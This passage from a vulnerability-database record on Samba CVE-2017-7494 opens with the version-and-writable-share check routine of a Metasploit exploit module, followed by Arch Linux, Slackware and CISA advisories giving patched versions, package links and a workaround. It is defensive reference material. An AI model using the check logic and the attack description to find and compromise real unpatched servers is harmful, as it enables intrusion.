def check\n res = smb_fingerprint\n\n unless res['native_lm'] =~ /Samba ([\\d\\.]+)/\n print_error(\"does not appear to be Samba: #{res['os']} / #{res['native_lm']}\")\n return CheckCode::Safe\n end\n\n samba_version = Gem::Version.new($1.gsub(/\\.$/, ''))\n\n vprint_status(\"Samba version identified as #{samba_version.to_s}\")\n\n if samba_version < Gem::Version.new('3.5.0')\n return CheckCode::Safe\n end\n\n # Patched in 4.4.14\n if samba_version < Gem::Version.new('4.5.0') &&\n samba_version >= Gem::Version.new('4.4.14')\n return CheckCode::Safe\n end\n\n # Patched in 4.5.10\n if samba_version > Gem::Version.new('4.5.0') &&\n samba_version < Gem::Version.new('4.6.0') &&\n samba_version >= Gem::Version.new('4.5.10')\n return CheckCode::Safe\n end\n\n # Patched in 4.6.4\n if samba_version >= Gem::Version.new('4.6.4')\n return CheckCode::Safe\n end\n\n smb_connect\n find_writeable_share_path\n disconnect\n\n if @share.to_s.length == 0\n print_status(\"Samba version #{samba_version.to_s} found, but no writeable share has been identified\")\n return CheckCode::Detected\n end\n\n print_good(\"Samba version #{samba_version.to_s} found with writeable share '#{@share}'\")\n return CheckCode::Appears\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/samba/is_known_pipename.rb"}], "archlinux": [{"lastseen": "2020-09-22T18:36:43", "bulletinFamily": "unix", "cvelist": ["CVE-2017-7494"], "description": "Arch Linux Security Advisory ASA-201705-22\n==========================================\n\nSeverity: High\nDate : 2017-05-30\nCVE-ID : CVE-2017-7494\nPackage : samba\nType : arbitrary code execution\nRemote : Yes\nLink : https://security.archlinux.org/AVG-279\n\nSummary\n=======\n\nThe package samba before version 4.5.10-1 is vulnerable to arbitrary\ncode execution.\n\nResolution\n==========\n\nUpgrade to 4.5.10-1.\n\n# pacman -Syu \"samba>=4.5.10-1\"\n\nThe problem has been fixed upstream in version 4.5.10.\n\nWorkaround\n==========\n\nAdd the parameter:\n\nnt pipe support = no\n\nto the [global] section of your smb.conf and restart smbd. This\nprevents clients from accessing any named pipe endpoints. Note that\nthis can disable some expected functionality for Windows clients.\n\nDescription\n===========\n\nAll versions of Samba from 3.5.0 onwards are vulnerable to a remote\ncode execution vulnerability, allowing a malicious client to upload a\nshared library to a writable share, and then cause the server to load\nand execute it.\n\nImpact\n======\n\nA malicious authenticated client can execute arbitrary code on the\naffected host by uploading a shared library to a writable share.\n\nReferences\n==========\n\nhttps://www.samba.org/samba/security/CVE-2017-7494.html\nhttps://security.archlinux.org/CVE-2017-7494", "modified": "2017-05-30T00:00:00", "published": "2017-05-30T00:00:00", "id": "ASA-201705-22", "href": "https://security.archlinux.org/ASA-201705-22", "type": "archlinux", "title": "[ASA-201705-22] samba: arbitrary code execution", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "slackware": [{"lastseen": "2020-10-25T16:36:29", "bulletinFamily": "unix", "cvelist": ["CVE-2017-7494"], "description": "New samba packages are available for Slackware 13.1, 13.37, 14.0, 14.1, 14.2,\nand -current to fix a security issue.\n\n\nHere are the details from the Slackware 14.2 ChangeLog:\n\npatches/packages/samba-4.4.14-i586-1_slack14.2.txz: Upgraded.\n This update fixes a remote code execution vulnerability, allowing a\n malicious client to upload a shared library to a writable share, and\n then cause the server to load and execute it.\n For more information, see:\n https://www.samba.org/samba/security/CVE-2017-7494.html\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7494\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/samba-3.5.22-i486-2_slack13.1.txz\n\nUpdated package for Slackware x86_64 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/samba-3.5.22-x86_64-2_slack13.1.txz\n\nUpdated package for Slackware 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/samba-3.5.22-i486-2_slack13.37.txz\n\nUpdated package for Slackware x86_64 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/samba-3.5.22-x86_64-2_slack13.37.txz\n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/samba-4.4.14-i486-1_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/samba-4.4.14-x86_64-1_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/samba-4.4.14-i486-1_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/samba-4.4.14-x86_64-1_slack14.1.txz\n\nUpdated package for Slackware 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/samba-4.4.14-i586-1_slack14.2.txz\n\nUpdated package for Slackware x86_64 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/samba-4.4.14-x86_64-1_slack14.2.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/samba-4.6.4-i586-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/samba-4.6.4-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 13.1 package:\nfbf0d50ebce5e496934ec71e2a469630 samba-3.5.22-i486-2_slack13.1.txz\n\nSlackware x86_64 13.1 package:\n26b98c39663aa6bc19341405a462cd5f samba-3.5.22-x86_64-2_slack13.1.txz\n\nSlackware 13.37 package:\n4fd566e8db519817cef6c0dd00b3f3c8 samba-3.5.22-i486-2_slack13.37.txz\n\nSlackware x86_64 13.37 package:\n51f6b1c81394f55fc81bb1ae77814deb samba-3.5.22-x86_64-2_slack13.37.txz\n\nSlackware 14.0 package:\n527dfcc8594234c66c6993abb4eaa51c samba-4.4.14-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 package:\n208596f558cb9779c9dbcaf952f87f84 samba-4.4.14-x86_64-1_slack14.0.txz\n\nSlackware 14.1 package:\n65f28566c666b4b5f3e33d67372525ef samba-4.4.14-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 package:\nddfa90d4c72cb065b52a150aa898043d samba-4.4.14-x86_64-1_slack14.1.txz\n\nSlackware 14.2 package:\nb533e541453620b47b2ce769aa73e0e2 samba-4.4.14-i586-1_slack14.2.txz\n\nSlackware x86_64 14.2 package:\na61aef22c3ea498bdbb8caba0ec8ff85 samba-4.4.14-x86_64-1_slack14.2.txz\n\nSlackware -current package:\n8e4bce86a15b0b6bb85b0b6894d8c587 n/samba-4.6.4-i586-1.txz\n\nSlackware x86_64 -current package:\n691f1e10acad26dbb0ddd268ed5415d0 n/samba-4.6.4-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg samba-4.4.14-i586-1_slack14.2.txz\n\nThen, if Samba is running restart it:\n\n > /etc/rc.d/rc.samba restart", "modified": "2017-05-24T20:34:46", "published": "2017-05-24T20:34:46", "id": "SSA-2017-144-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2017&m=slackware-security.513769", "type": "slackware", "title": "[slackware-security] samba", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cisa": [{"lastseen": "2021-02-24T18:07:39", "bulletinFamily": "info", "cvelist": ["CVE-2017-7494"], "description": "The Samba Team has released security updates that address a vulnerability in all versions of Samba from 3.5.0 onward. A remote attacker could exploit this vulnerability to take control of an affected system.\n\nUS-CERT encourages users and administrators to review Samba's [Security Announcement](<https://www.samba.org/samba/security/CVE-2017-7494.html>) and apply the necessary updates, or refer to their Linux or Unix-based OS vendors for appropriate patches.\n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2017/05/24/Samba-Releases-Security-Updates>); we'd welcome your feedback.\n", "modified": "2017-05-24T00:00:00", "published": "2017-05-24T00:00:00", "id": "CISA:384A71FB1AD858FAC86EEB1A7660E778", "href": "https://us-cert.cisa.gov/ncas/current-activity/2017/05/24/Samba-Releases-Security-Updates", "type": "cisa", "title": "Samba Releases Security Updates", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}